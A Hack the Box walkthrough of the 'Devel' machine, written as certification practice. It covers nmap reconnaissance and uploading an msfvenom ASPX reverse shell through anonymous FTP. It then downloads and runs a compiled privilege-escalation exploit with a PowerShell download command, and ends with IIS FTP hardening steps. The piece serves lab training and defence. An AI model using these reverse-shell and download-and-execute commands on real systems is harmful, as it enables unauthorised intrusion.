Hack the Box — Devel

Ethan Troy
Published in Offensive Walking
3 min read · Mar 6, 2023

One of the first HTB boxes I solved a few months ago from the TJ Null List in preparation for the PNPT and OSCP.

Solving the “Devel” box can be divided into 3 main steps:

  1. Recon
  • We conduct some recon using nmap or rustscan
  • look into MS-IIS/7.5, google a bit about executable file types

  2. Enumeration
  • using the anonymous FTP access

  3. Exploitation

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.5
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.5
nmap -sU -O -oA nmap/udp 10.10.10.5

Enumeration

We have some web-facing material and we can try to go to these pages.

> I think “evil” is left over from someone else working on the box 😅

Exploitation

Create reverse-shell.aspx with msfvenom

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.37 LPORT=4444 -o reverse-shell.aspx

Push reverse-shell.aspx to the webserver

Start a listener with netcat in another terminal

nc -nlvp 4444

Visit http://10.10.10.5/reverse-shell.aspx to activate the payload

Gain shell on the listener

Priv Esc

Find an exploit that works

searchsploit -m 40564

#this copies the exploit source into our current directory

Compile it

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Serve it over HTTP from the attacking machine (the download command below expects it on port 443)

Get it with powershell or certutil

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:443/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Once 40564.exe is run on the target, the priv esc is immediate

Mitigation: How could this attack have been stopped?

  1. Disable anonymous access to the FTP server
  2. Configure the FTP server to only allow downloads
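The two mitigations above, applied to the IIS FTP server that the box exposes. This is an added example and not part of the original write-up; it uses the IIS WebAdministration PowerShell module, and the site name "Default FTP Site" is a placeholder for whatever the real FTP site is called. The weak state is the one the walkthrough abuses: anonymous logins allowed and the authorization rule granting Write, with the FTP root mapped onto the web root so an uploaded .aspx is served by IIS. The hardened state turns anonymous authentication off and leaves every account with Read only.

```powershell
# Added example (not from the original post). Assumes the IIS WebAdministration
# module is available and an FTP site named "Default FTP Site" (placeholder).
Import-Module WebAdministration

$site = "Default FTP Site"   # assumption: substitute the real FTP site name

# --- Weak configuration the walkthrough relies on (shown for contrast) ---
# Anonymous authentication enabled, and an authorization rule that lets
# everyone ("*") both Read and Write into the FTP root:
#   ftpServer.security.authentication.anonymousAuthentication.enabled = True
#   <add accessType="Allow" users="*" permissions="Read, Write" />

# --- Mitigation 1: disable anonymous access ---
Set-ItemProperty "IIS:\Sites\$site" `
    -Name ftpServer.security.authentication.anonymousAuthentication.enabled `
    -Value $false

# Require an authenticated (Basic) login instead; Basic sends credentials in
# the clear, so it should only be used with FTPS on the control channel.
Set-ItemProperty "IIS:\Sites\$site" `
    -Name ftpServer.security.authentication.basicAuthentication.enabled `
    -Value $true

# --- Mitigation 2: downloads only (no Write permission for anyone) ---
# Drop whatever authorization rules exist for the site, then add a single
# Allow rule for all users that grants Read only.
Clear-WebConfiguration "/system.ftpServer/security/authorization" `
    -PSPath "IIS:\" -Location $site

Add-WebConfiguration "/system.ftpServer/security/authorization" `
    -PSPath "IIS:\" -Location $site `
    -Value @{ accessType = "Allow"; users = "*"; permissions = "Read" }

# --- Verify the resulting state ---
Get-ItemProperty "IIS:\Sites\$site" `
    -Name ftpServer.security.authentication.anonymousAuthentication.enabled

Get-WebConfiguration "/system.ftpServer/security/authorization" `
    -PSPath "IIS:\" -Location $site |
    Select-Object accessType, users, roles, permissions
```

Even with both changes in place, the root cause worth fixing is the shared directory: an FTP root that is also the IIS web root turns any write path into remote code execution. Pointing the FTP site at a directory IIS does not serve removes that link entirely.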
